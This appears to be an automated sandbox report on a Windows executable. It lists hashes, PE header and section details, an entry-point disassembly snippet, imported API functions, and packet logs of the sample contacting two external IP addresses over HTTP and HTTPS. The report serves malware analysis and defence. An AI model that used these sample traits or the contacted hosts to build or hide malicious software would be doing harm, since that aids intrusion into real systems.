                                                                                                                                                  SHA256:0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
                                                                                                                                                  SHA512:7951ab74ecd2ea26ed7bbcbc8bf34a770854a8fb009f256f93d72c705871b5a31c24153cc77581eec6544085cdbb51a170b2b7ef9f3f9139572b818d75424ca6
                                                                                                                                                  SSDEEP:98304:ijIHEaC7gS8j+u8ME/F59JdQVDQYxb6FqrnGGs3ycc6dNIdvlDPAQ1q14gaT:ijeEaC7gS6wMEdv4BQYhGPNPgdvlDHoG
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8.....

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:5c5cd81ce4e4e0e2

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push ebp
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  xor ebp, ebp
                                                                                                                                                  pop esi
                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                  push 00008001h
                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                  push 00000008h
                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                  call 00007F158C36174Bh
                                                                                                                                                  push ebp
                                                                                                                                                  push 000002B4h
                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                  push eax
                                                                                                                                                  push ebp
                                                                                                                                                  push 0040A264h
                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                  push 0040A24Ch
                                                                                                                                                  push 00476AA0h
                                                                                                                                                  call 00007F158C36142Dh
                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                  push eax
                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                  push edi
                                                                                                                                                  call 00007F158C36141Bh
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                  mov eax, edi
                                                                                                                                                  jne 00007F158C35ED1Ah
                                                                                                                                                  push 00000022h
                                                                                                                                                  pop esi
                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                  push esi
                                                                                                                                                  push eax
                                                                                                                                                  call 00007F158C3610F1h
                                                                                                                                                  push eax
                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                  mov esi, eax
                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                  jmp 00007F158C35EDA3h
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop ebx
                                                                                                                                                  cmp ax, bx
                                                                                                                                                  jne 00007F158C35ED1Ah
                                                                                                                                                  add esi, 02h
                                                                                                                                                  cmp word ptr [esi], bx

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1340000xc308.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x728c0x7400False0.656654094828data6.49970859063IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x90000x2b6e0x2c00False0.367897727273data4.49793253515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xc0000x72b9c0x200False0.279296875data1.80494062846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .ndata0x7f0000xb50000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x1340000xc3080xc400False0.0863560267857data2.71075910677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1410000xfd60x1000False0.062744140625PGP\011Secret Sub-key -2.12802410158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                  RT_ICON0x1343580x4228dataEnglishUnited States
                                                                                                                                                  RT_ICON0x1385800x25a8dBase III DBT, version number 0, next free block index 40, 1st item "I\310\354\377\221\347\377\377s\337\375\377\265\357\377\377\227\350\377\377\214\346\377\377\213\346\377\377\212\345\377\377\211\345\377\377\210\345\377\377\207\345\377\377\206\344\377\377\205\344\377\377\204\344\377\377U\312\355\377u\333\371\377\203\344\377\377F\301\347\377"EnglishUnited States
                                                                                                                                                  RT_ICON0x13ab280x1a68dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                                                                  RT_ICON0x13c5900x10a8dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13d6380xfe9dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13e6280x988dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13efb00x6b8dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13f6680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fad00x100dataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fbd00x11cdataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fcf00xc4dataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fdb80x60dataEnglishUnited States
                                                                                                                                                  RT_GROUP_ICON0x13fe180x76dataEnglishUnited States
                                                                                                                                                  RT_VERSION0x13fe900x18cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                  RT_MANIFEST0x1400200x2e1XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                  Version Infos

                                                                                                                                                  DescriptionData
                                                                                                                                                  LegalCopyright
                                                                                                                                                  ProductVersion0.0.0
                                                                                                                                                  FileVersion0.0.0
                                                                                                                                                  FileDescription
                                                                                                                                                  Translation0x0000 0x04b0

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 5, 2020 08:41:53.396342039 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.419894934 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.420084953 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.420881033 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.420972109 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.444530964 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.444561958 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:54.931421995 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:54.972645998 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.029978037 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.030023098 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.053693056 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:55.053736925 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:57.531936884 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:57.582412004 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.116226912 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140170097 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.140362024 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140707016 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140763044 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.164212942 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.164251089 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:52.078556061 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:52.133634090 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.574632883 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.598304033 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:57.598402977 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.924711943 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.924752951 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.948404074 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:57.948445082 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278107882 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278158903 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278300047 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.316557884 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.316618919 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.340292931 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.340337038 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:02.855652094 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:02.900206089 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.095493078 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.095556974 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.119226933 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:03.119262934 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:03.119288921 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.337274075 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.348758936 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:04.348802090 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:04.372395039 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.372437000 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:07.258394003 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:07.292275906 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:07.315965891 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.427812099 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.427855015 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.428031921 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:12.423928976 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.447808981 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.448055029 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.450779915 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.474365950 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476684093 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476727009 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476861954 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.482043028 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.505711079 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.510257006 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.557308912 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.606618881 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.606662989 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.630362034 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.630414009 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:13.062382936 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:13.104167938 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:28.422986031 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.446660042 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.446923018 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.448842049 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.448959112 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.472414970 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.472453117 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:30.096564054 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:30.097744942 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:30.120212078 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:30.121156931 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:32.399786949 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:32.449434042 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.078567982 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.102315903 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.103343964 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.103669882 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.103720903 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.127188921 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.127238989 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:34.401576996 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:34.449618101 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:36.861763954 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:36.913867950 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:40.024529934 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:40.024590969 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:40.048199892 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:40.048227072 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:41.800034046 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:43.565794945 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.618387938 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:43.619743109 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:43.643479109 CET8049749104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.643738985 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:43.650659084 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:43.674228907 CET8049749104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:44.997695923 CET8049749104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:44.997734070 CET8049749104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:44.998016119 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:45.821965933 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:45.845767975 CET8049749104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:45.845964909 CET4974980192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:49.141128063 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:57.305152893 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:57.305206060 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:57.328896046 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:57.328929901 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.680834055 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.791485071 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:44:38.046298027 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:44:38.070187092 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.071163893 CET49739443192.168.2.3172.67.142.39

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 5, 2020 08:40:16.078028917 CET6349253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:16.105356932 CET53634928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:17.102169991 CET6083153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:17.129614115 CET53608318.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:18.101419926 CET6010053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:18.128889084 CET53601008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:19.030033112 CET5319553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:19.057182074 CET53531958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:20.430130959 CET5014153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:20.465615034 CET53501418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:21.566843987 CET5302353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:21.602277040 CET53530238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:22.508847952 CET4956353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:22.536039114 CET53495638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:24.281058073 CET5135253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:24.316639900 CET53513528.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:25.486912012 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:25.514307022 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:26.133063078 CET5708453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:26.160259962 CET53570848.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:26.928248882 CET5882353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:26.955522060 CET53588238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:43.802752018 CET5756853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:43.841918945 CET53575688.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:44.715892076 CET5054053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:44.743092060 CET53505408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:05.129650116 CET5436653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:05.166774988 CET53543668.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:49.993284941 CET5303453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:50.030539989 CET53530348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:52.231416941 CET5776253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:52.275213957 CET53577628.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.342662096 CET5543553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET53554358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:11.372323036 CET5071353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:11.399462938 CET53507138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:19.426088095 CET5613253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:19.461699009 CET53561328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.059262991 CET5898753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET53589878.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.375412941 CET5657953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET53565798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.374576092 CET6063353192.168.2.38.8.8.8
